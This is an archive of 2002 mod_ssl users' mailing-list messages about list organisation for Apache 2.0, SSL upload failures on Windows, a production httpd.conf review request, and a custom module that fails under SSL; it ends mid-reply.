8 Apr 2002 17:32:45 -0400 (EDT) Received: from netscape.com (mow-m02.webmail.aol.com [64.12.184.130]) by air-in02.mx.aol.com (v84.14) with ESMTP id MAILININ24-0408173245; Mon, 08 Apr 2002 17:32:45 -0500 Date: Mon, 08 Apr 2002 17:32:45 -0400 From: gjmwalsh@netscape.net (George Walsh) To: modssl-users@modssl.org Subject: RE: Re: Apache 2.0.* and SSL Message-ID: <71FF810A.162ECA63.009AA07D@netscape.net> X-Mailer: Atlas Mailer 2.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: gjmwalsh@netscape.net (George Walsh) X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Oh please, no, not another one .... I'm drowning just trying to keep up as it is, but that, as they say, is but one man's opinion. I know - I don't have to joi, but then the existing established groups might not be as representative as they would otherwise be. George >On Mon, 8 Apr 2002, Eli Marmor wrote: > >> I think that we should open a special mailing list for mod_ssl of >> Apache2. > >My personal opinion would be that most modssl users' questions will be of >the same nature regardless of version. The kinds of questions we get >here: > > (1) why can't I use NBVH+SSL? > (2) how do I get my certificate created and/or to work > (3) I'm having problems getting IE to connect, what do I do? > (4) ... > >The answers to these questions are all the same regardless of whether >you're talking about 1.3 or 2.0, and there will always be those of us on >the httpd development team that listen in on modssl-users for potential >bugs, so in my mind it makes sense to keep the user group as one. > >But that's just me... if you guys disagree, then go right ahead and create >a new list. > >--Cliff > >-------------------------------------------------------------- > Cliff Woolley > cliffwoolley@yahoo.com > Charlottesville, VA > > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > -- George Walsh, Managing Director, CruiseRoutes Division, DSC Directional Services Corp Courtenay, British Columbia, Canada __________________________________________________________________ Your favorite stores, helpful shopping tools and great gift ideas. Experience the convenience of buying online with Shop@Netscape! http://shopnow.netscape.com/ Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 8 23:47:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA19553; Mon, 8 Apr 2002 23:46:33 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from engrsrv8.eng.lsu.edu id XAA19518; Mon, 8 Apr 2002 23:45:37 +0200 (MET DST) Received: from DESG01 (engw0236.eng.lsu.edu [130.39.28.236]) by engrsrv8.eng.lsu.edu (8.11.2/8.11.2) with ESMTP id g38Lh8e15099 for ; Mon, 8 Apr 2002 16:43:08 -0500 From: "Steve Gonzales" To: Subject: RE: Apache 2.0.* and SSL Date: Mon, 8 Apr 2002 16:45:01 -0500 Message-ID: <001901c1df46$a32b4030$ec1c2782@eng.lsu.edu> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 In-Reply-To: Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Steve Gonzales" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users One list is enough for me. SSL theory doesn't change from 1.3.xx to 2.0.xx; only the configuration and installation changes. Steve Gonzales Louisiana State University gonzo@eng.lsu.edu Division of Engineering Services 225.578.6069 (v) 3216G CEBA 225.578.5990 (f) Baton Rouge, LA 70803 -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On Behalf Of Cliff Woolley Sent: Monday, April 08, 2002 3:34 PM To: modssl-users@modssl.org Subject: Re: Apache 2.0.* and SSL On Mon, 8 Apr 2002, Eli Marmor wrote: > I think that we should open a special mailing list for mod_ssl of > Apache2. My personal opinion would be that most modssl users' questions will be of the same nature regardless of version. The kinds of questions we get here: (1) why can't I use NBVH+SSL? (2) how do I get my certificate created and/or to work (3) I'm having problems getting IE to connect, what do I do? (4) ... The answers to these questions are all the same regardless of whether you're talking about 1.3 or 2.0, and there will always be those of us on the httpd development team that listen in on modssl-users for potential bugs, so in my mind it makes sense to keep the user group as one. But that's just me... if you guys disagree, then go right ahead and create a new list. --Cliff -------------------------------------------------------------- Cliff Woolley cliffwoolley@yahoo.com Charlottesville, VA ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 8 23:51:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA19742; Mon, 8 Apr 2002 23:50:31 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id XAA19708; Mon, 8 Apr 2002 23:49:59 +0200 (MET DST) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g38LnGF16717 for ; Mon, 8 Apr 2002 17:49:16 -0400 Date: Mon, 8 Apr 2002 17:49:16 -0400 (EDT) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: modssl-users@modssl.org Subject: RE: Apache 2.0.* and SSL In-Reply-To: <001901c1df46$a32b4030$ec1c2782@eng.lsu.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Mon, 8 Apr 2002, Steve Gonzales wrote: > One list is enough for me. SSL theory doesn't change from 1.3.xx to > 2.0.xx; only the configuration and installation changes. And even that is mostly the same. :) -------------------------------------------------------------- Cliff Woolley cliffwoolley@yahoo.com Charlottesville, VA ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 9 00:21:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id AAA22553; Tue, 9 Apr 2002 00:20:30 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ip9.elmar.co.il id AAA22508; Tue, 9 Apr 2002 00:19:27 +0200 (MET DST) Received: from netmask.it (ip9.elmar.co.il [192.168.1.9]) by ip9.elmar.co.il (8.11.6/8.11.6) with ESMTP id g38MITr28480 for ; Tue, 9 Apr 2002 01:18:29 +0300 Message-ID: <3CB21735.E9101078@netmask.it> Date: Tue, 09 Apr 2002 01:18:29 +0300 From: Eli Marmor Organization: Netmask (El-Mar) Internet Technologies X-Mailer: Mozilla 4.08 [Hebrew Support by elmar.co.il (X11; I; Linux 2.4.8-26mdk i686) MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Apache 2.0.* and SSL References: <001901c1df46$a32b4030$ec1c2782@eng.lsu.edu> Content-Type: text/plain; charset=iso-8859-8 Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Eli Marmor X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Steve Gonzales wrote: > One list is enough for me. SSL theory doesn't change from 1.3.xx to > 2.0.xx; only the configuration and installation changes. There are many other issues, like the "-DEAPI" and 3rd party modules that cause Apache to crash. Anyway, the fact is that all of the discussions regarding 2.0 are done in the new-httpd list, and not here (at least till this thread). So it is clear that something must be done. Maybe a request to new-httpd subscribers to move the SSL discussions to here? -- Eli Marmor marmor@netmask.it CTO, Founder Netmask (El-Mar) Internet Technologies Ltd. __________________________________________________________ Tel.: +972-9-766-1020 8 Yad-Harutzim St. Fax.: +972-9-766-1314 P.O.B. 7004 Mobile: +972-50-23-7338 Kfar-Saba 44641, Israel ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 9 01:53:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id BAA26380; Tue, 9 Apr 2002 01:52:11 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mta4-rme.xtra.co.nz id BAA26369; Tue, 9 Apr 2002 01:51:51 +0200 (MET DST) Received: from there ([210.86.52.43]) by mta4-rme.xtra.co.nz with SMTP id <20020408235143.IMGX18378.mta4-rme.xtra.co.nz@there> for ; Tue, 9 Apr 2002 11:51:43 +1200 Content-Type: text/plain; charset="iso-8859-8" From: Geoff Thorpe To: modssl-users@modssl.org Subject: Re: Apache 2.0.* and SSL Date: Tue, 9 Apr 2002 12:52:26 +1200 X-Mailer: KMail [version 1.3.1] References: <001901c1df46$a32b4030$ec1c2782@eng.lsu.edu> <3CB21735.E9101078@netmask.it> In-Reply-To: <3CB21735.E9101078@netmask.it> MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <20020408235143.IMGX18378.mta4-rme.xtra.co.nz@there> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Geoff Thorpe X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hey there, On Tuesday 09 April 2002 10:18, you wrote: > Steve Gonzales wrote: > > One list is enough for me. SSL theory doesn't change from 1.3.xx to > > 2.0.xx; only the configuration and installation changes. > > There are many other issues, like the "-DEAPI" and 3rd party modules > that cause Apache to crash. > > Anyway, the fact is that all of the discussions regarding 2.0 are done > in the new-httpd list, and not here (at least till this thread). So it > is clear that something must be done. Maybe a request to new-httpd > subscribers to move the SSL discussions to here? I would respectfully suggest that modssl discussions stay here. I don't want to rag on Apache 2.0, and I'm sure a lot of good things have found their way into it, but it does not solve a number of issues that I think many people in production environments would require to push them into a pro-active decision to migrate. Likewise, it introduces an entirely new base of code with considerably less real-world mileage than the Apache 1.3.** base, so there's a non-trivial motivation to *not* migrate unless absolutely necessary. Apache 2.0 has clearly also been taking what one might call an, ummm, let's say "value-added" design approach. If your focus is on SSL/TLS, security, and serving up HTML through a robust and secure server, then having something new that tries to multiplex a huge number of different features and services (in the same address-space as one another, moreover!) is a can of worms that many people will consider best left shut. For now at the very least. So if discussion on the SSL module is in someways independant (or at least may often be independant) of the apache version, I'd suggest we keep discussion in this one place. For my own part; in the near future, I will be working again on session caching and other tuning operations on the Apache 1.3.***-based modssl distribution and [will] have neither the time nor inclination to involve myself in the goings-on of Apache 2.0. I won't mind at *all* if someone who does have the time and motivation handles merging anything useful from that to the apache 2.0 code-base - but I won't be reading from, or posting to, anything Apache 2.0-specific. Cheers, Geoff ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 9 03:06:47 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA29791; Tue, 9 Apr 2002 03:05:50 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id DAA29681; Tue, 9 Apr 2002 03:03:45 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 679E74CE762; Tue, 9 Apr 2002 03:03:43 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g38HeP318037; Mon, 8 Apr 2002 19:40:25 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from services.teiath.gr id KAA10333; Mon, 8 Apr 2002 10:41:06 +0200 (MET DST) From: support@cs.teiath.gr Received: (from nobody@localhost) by services.teiath.gr (8.11.0/8.11.0) id g388jEA15011 for modssl-users@modssl.org; Mon, 8 Apr 2002 11:45:14 +0300 X-Authentication-Warning: services.teiath.gr: nobody set sender to support@cs.teiath.gr using -f Received: from 195.130.109.71 ( [195.130.109.71]) as user support@kde.cs.teiath.gr by webmail.teiath.gr with HTTP; Mon, 8 Apr 2002 11:45:14 +0300 Message-ID: <1018255514.3cb1589a2c245@webmail.teiath.gr> Date: Mon, 8 Apr 2002 11:45:14 +0300 To: modssl-users@modssl.org Subject: problem starting apache with ssl-mod_ssl MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-7 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 2.3.7-cvs X-Originating-IP: 195.130.109.71 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: support@cs.teiath.gr X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users greetings to everyone i have the following problem and it will be very nice of you if you could help me out with this! in one redhat7.2 i have installed apache/php/ssl/mod_ssl as it can be seen at the end of my mail In the httpd.conf i have put the following: ***httpd.conf*** ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 9 03:06:54 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA29652; Tue, 9 Apr 2002 03:03:18 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from imo-d02.mx.aol.com id DAA29610; Tue, 9 Apr 2002 03:02:26 +0200 (MET DST) Received: from gjmwalsh@netscape.net by imo-d02.mx.aol.com (mail_out_v32.5.) id m.10b.21cd331 (22683) for ; Mon, 8 Apr 2002 21:01:43 -0400 (EDT) Received: from netscape.com (mow-m02.webmail.aol.com [64.12.184.130]) by air-in04.mx.aol.com (v84.14) with ESMTP id MAILININ44-0408210143; Mon, 08 Apr 2002 21:01:43 -0500 Date: Mon, 08 Apr 2002 21:01:43 -0400 From: gjmwalsh@netscape.net (George Walsh) To: modssl-users@modssl.org Subject: RE: Re: Apache 2.0.* and SSL Message-ID: <01463C43.2A0DB7A8.009AA07D@netscape.net> X-Mailer: Atlas Mailer 2.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: gjmwalsh@netscape.net (George Walsh) X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Very well said, Geoff. I have 'played' with Apache 2.0 but certainly not with anything having to do with https and ssl. Now, with a heavy launch schedule in front of me, I have all I can do to switch people out of windows and into KDE/GNOME environments. Respectfully, George Geoff Thorpe wrote: >Hey there, > >On Tuesday 09 April 2002 10:18, you wrote: >> Steve Gonzales wrote: >> > One list is enough for me. SSL theory doesn't change from 1.3.xx to >> > 2.0.xx; only the configuration and installation changes. >> >> There are many other issues, like the "-DEAPI" and 3rd party modules >> that cause Apache to crash. >> >> Anyway, the fact is that all of the discussions regarding 2.0 are done >> in the new-httpd list, and not here (at least till this thread). So it >> is clear that something must be done. Maybe a request to new-httpd >> subscribers to move the SSL discussions to here? > >I would respectfully suggest that modssl discussions stay here. I don't want >to rag on Apache 2.0, and I'm sure a lot of good things have found their way >into it, but it does not solve a number of issues that I think many people in >production environments would require to push them into a pro-active decision >to migrate. Likewise, it introduces an entirely new base of code with >considerably less real-world mileage than the Apache 1.3.** base, so there's >a non-trivial motivation to *not* migrate unless absolutely necessary. > >Apache 2.0 has clearly also been taking what one might call an, ummm, let's >say "value-added" design approach. If your focus is on SSL/TLS, security, and >serving up HTML through a robust and secure server, then having something new >that tries to multiplex a huge number of different features and services (in >the same address-space as one another, moreover!) is a can of worms that many >people will consider best left shut. For now at the very least. > >So if discussion on the SSL module is in someways independant (or at least >may often be independant) of the apache version, I'd suggest we keep >discussion in this one place. > >For my own part; in the near future, I will be working again on session >caching and other tuning operations on the Apache 1.3.***-based modssl >distribution and [will] have neither the time nor inclination to involve >myself in the goings-on of Apache 2.0. I won't mind at *all* if someone who >does have the time and motivation handles merging anything useful from that >to the apache 2.0 code-base - but I won't be reading from, or posting to, >anything Apache 2.0-specific. > >Cheers, >Geoff > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > -- George Walsh, Managing Director, CruiseRoutes Division, DSC Directional Services Corp Courtenay, British Columbia, Canada __________________________________________________________________ Your favorite stores, helpful shopping tools and great gift ideas. Experience the convenience of buying online with Shop@Netscape! http://shopnow.netscape.com/ Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 9 03:07:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA29813; Tue, 9 Apr 2002 03:06:18 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id DAA29682; Tue, 9 Apr 2002 03:03:46 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 518BC4CE76B; Tue, 9 Apr 2002 03:03:44 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g38Hf2L18061; Mon, 8 Apr 2002 19:41:02 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id SAA03887; Mon, 8 Apr 2002 18:15:22 +0200 (MET DST) Date: Mon, 8 Apr 2002 18:15:22 +0200 (MET DST) Message-Id: <200204081615.SAA03887@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: [BugDB] SSL problem question (PR#692) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Full_Name: Jaymes Redus Version: Apache version 1.3.12 mod_ssl 2.6.2 OS: Windows 2000 Submission from: (NULL) (208.63.63.94) Hi my name is Jaymes Redus and I work with Affliated Computer Systems here in Tallahassee, I just wanted to ask a question concerning a SSL issue that we are having. We are having a problem with our Upload functionality on our Web Application. It seems that if a customer tries to upload a file or text file(encrypted) that's under 57 MB it works fine but if the file is 58 MB(encrypted) or higher the upload fails. So in other words all files that are under 57 MB(encrypted) and the SSL layer is enabled works fine, but all files that are uploaded that are more than 57MB(encrypted) with the SSL enabled the upload fails. I have tried the same upload function with the SSL disabled and files 57 MB and higher and lower works fine. It seems that once the SSL is activated large files are not able to be uploaded. Can you help us with this problem? A cgi script written internally in C++ ...The funny thing is that the you can upload the kitchen sink without the SSL..... works like a charm. But when you put SSL in the mix problems occur. The SSL handshake occurs and the file starts to upload then all of the sudden the SSL connection is lost. To throw in another curve ball we have a download script written in C++ as well almost identical to the upload script and that has been working fine no problems. Weird..... ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 9 03:37:18 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA01897; Tue, 9 Apr 2002 03:36:14 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP from deepthought.cs.virginia.edu id DAA01870; Tue, 9 Apr 2002 03:35:46 +0200 (MET DST) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g391Z2m16923; Mon, 8 Apr 2002 21:35:02 -0400 Date: Mon, 8 Apr 2002 21:35:02 -0400 (EDT) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: modssl-users@modssl.org cc: modssl-bugdb@modssl.org Subject: Re: [BugDB] SSL problem question (PR#692) In-Reply-To: <200204081615.SAA03887@opensource.ee.ethz.ch> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Mon, 8 Apr 2002 modssl-bugdb@modssl.org wrote: > Hi my name is Jaymes Redus and I work with Affliated Computer Systems > here in Tallahassee, I just wanted to ask a question concerning a SSL > issue that we are having. We are having a problem with our Upload > functionality on our Web Application. It seems that if a customer tries > to upload a file or text file(encrypted) that's under 57 MB it works > fine but if the file is 58 MB(encrypted) or higher the upload fails. Several Win32 system calls have (ridiculous) hidden limits right around the 56-57MB limit. Among the ones I've seen that fail when passed more data than that in a single call: WriteFile() TransmitFile() I'm willing to bet you're using WriteFile(). If so, make sure you check its return code for errors. You'll get back something like ERROR_INSUFFICIENT_RESOURCES (or something like that, I don't remember exactly what it is off the top of my head). You'd have to loop on the WriteFile() call and pass it bite-sized chunks to get it to work. But in general, do you really want a web application buffering that much in memory? Surely not. --Cliff -------------------------------------------------------------- Cliff Woolley cliffwoolley@yahoo.com Charlottesville, VA ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 9 04:33:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id EAA04250; Tue, 9 Apr 2002 04:32:11 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from troy.barwonwater.vic.gov.au id EAA04227; Tue, 9 Apr 2002 04:31:44 +0200 (MET DST) Received: from barwonwater.vic.gov.au (hamilton.is.barwonwater.vic.gov.au [138.19.8.48]) by troy.barwonwater.vic.gov.au (8.9.3+Sun/8.9.3) with ESMTP id MAA02123 for ; Tue, 9 Apr 2002 12:31:32 +1000 (EST) Message-ID: <3CB25283.5010800@barwonwater.vic.gov.au> Date: Tue, 09 Apr 2002 12:31:31 +1000 From: Chris Welsh Organization: Barwon Water User-Agent: Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:0.9.7) Gecko/20020104 X-Accept-Language: en-us MIME-Version: 1.0 To: modssl-users@modssl.org Subject: httpd.conf - going production in 3 days Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Chris Welsh X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello, I'm about to go production with our mod_ssl web site. We are using the following: Web server in the DMZ Solaris 2.8/ Netra with 128Mb ram mod_ssl-2.8.5-1.3.22 openssl-0.9.6b chroot'd Apache 1.3.22 (mod_coldfusion) (mod_rewrite) Coldfusion 5.0 in distributed mode (cfremote) (Basically all gif, pdf html content local, but all .cfm content is located and processed on the coldfusion server behind the firewall) esign global cct. Corperate Network (behind the firewall) Solaris 2.8 / Dual proc Sun 250 with 2gb memory Coldfusion 5.0 server. Data bases, etc. I'm no guru when it comes to ssl so I'm wondering if some of you could run your eyes over my httpd.conf file with the following things in mind 1 - Most of our clients will be using MSIE 5.0+ 2 - Most will be external users 3 - I'm interested in mistake I've made in relation to security settings 4 - Mistakes that may have caused issues with performance and reliability 5 - Note I have commented out the Rewite directives because the server tells me that I have misspelled it. Cannot understand it. Any ideas??? I did compile with rewrite option enabled) 6 - Anyone got a test plan I can use? 7 - Any comments on cfdist and cfremote? Thanks. -- regards, Christopher Welsh System Administrator, Voice:+61 03 52262385 Barwon Water, Geelong, Mobile: 0409 562968 3220, Vic, Australia Fax: +61 03 52210094 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 9 10:31:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA19982; Tue, 9 Apr 2002 10:30:18 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hotmail.com id KAA19944; Tue, 9 Apr 2002 10:29:53 +0200 (MET DST) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Tue, 9 Apr 2002 01:29:47 -0700 Received: from 80.58.0.171 by lw12fd.law12.hotmail.msn.com with HTTP; Tue, 09 Apr 2002 08:29:46 GMT X-Originating-IP: [80.58.0.171] From: "Robert Flicker" To: modssl-users@modssl.org Subject: mod_ssl compatibility with custom module Date: Tue, 09 Apr 2002 08:29:46 +0000 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 09 Apr 2002 08:29:47.0141 (UTC) FILETIME=[B53B5350:01C1DFA0] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Robert Flicker" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi: I have developed a custom module for a company and works fine with normal apache. When pathing apache with modssl stuff works fine under non-encrypted connections but with ssl fails. The module intercepts the post data (ap_get_client_block and this stuff) writes to a file and swaps the fd_in: Some pseudo code to clarify terms... ---- //loop to read post data... ap_get_client_block(...); // write data to fd_in write(fd_in,...); //rewind it // swap fd_in ap_bpushfd(r->connection->client,fd_in,r->connection->client->fd_in); ---- Again: normal apache: works fine apache + mod_ssl + unencrypted conns: works fine apache + mod_ssl + encrypted conns: dumps data to file and onnection seems to timeout... Any clue? Thx in advance .-rf _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 9 10:41:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA20489; Tue, 9 Apr 2002 10:40:16 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from dukas.upc.es id KAA20478; Tue, 9 Apr 2002 10:39:57 +0200 (MET DST) Received: from parra.upc.es (parra.upc.es [147.83.36.80]) by dukas.upc.es (8.12.1/8.12.1) with ESMTP id g398dtnc028080; Tue, 9 Apr 2002 10:39:55 +0200 (MET DST) Received: from localhost (localhost [127.0.0.1]) by parra.upc.es (Postfix) with ESMTP id 234A461A2F; Tue, 9 Apr 2002 10:39:49 +0200 (MET DST) Received: from etsetb.upc.es (dalia.upc.es [147.83.36.36]) by parra.upc.es (Postfix) with ESMTP id DC37161A2A; Tue, 9 Apr 2002 10:39:45 +0200 (MET DST) Message-ID: <3CB29A90.BF12FB62@etsetb.upc.es> Date: Tue, 09 Apr 2002 09:38:56 +0200 From: Sergi Mayordomo X-Mailer: Mozilla 4.78 [es] (X11; U; Linux 2.4.7-10 i586) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Cc: robert_flicker@hotmail.com Subject: Re: mod_ssl compatibility with custom module References: Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Virus-Scanned: by AMaViS perl-10 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Sergi Mayordomo X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Robert Flicker escribió: > > Hi: > > I have developed a custom module for a company and works fine with normal > apache. When pathing apache with modssl stuff works fine under non-encrypted > connections but with ssl fails. > > The module intercepts the post data (ap_get_client_block and this stuff) > writes to a file and swaps the fd_in: > > Some pseudo code to clarify terms... > ---- > > //loop to read post data... > ap_get_client_block(...); > // write data to fd_in > write(fd_in,...); > //rewind it > > // swap fd_in > ap_bpushfd(r->connection->client,fd_in,r->connection->client->fd_in); > > ---- > > Again: > > normal apache: works fine > apache + mod_ssl + unencrypted conns: works fine > apache + mod_ssl + encrypted conns: dumps data to file and onnection seems > to timeout... > > Any clue? > > Thx in advance > .-rf > Does your module need any start configuration at httpd.conf? if it does, the lines .. .. in the remote machine definition solves the problem. I dont know if it is the best solution. Bye ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 9 13:21:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA01267; Tue, 9 Apr 2002 13:20:25 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hotmail.com id NAA01207; Tue, 9 Apr 2002 13:19:50 +0200 (MET DST) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Tue, 9 Apr 2002 04:08:37 -0700 Received: from 80.58.0.171 by lw12fd.law12.hotmail.msn.com with HTTP; Tue, 09 Apr 2002 11:08:37 GMT X-Originating-IP: [80.58.0.171] From: "Robert Flicker" To: modssl-users@modssl.org Subject: Re: mod_ssl compatibility with custom module Date: Tue, 09 Apr 2002 11:08:37 +0000 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 09 Apr 2002 11:08:37.0586 (UTC) FILETIME=[E5D1D320:01C1DFB6] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Robert Flicker" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users >Does your module need any start configuration at httpd.conf? if it does, >the lines > >.. >.. 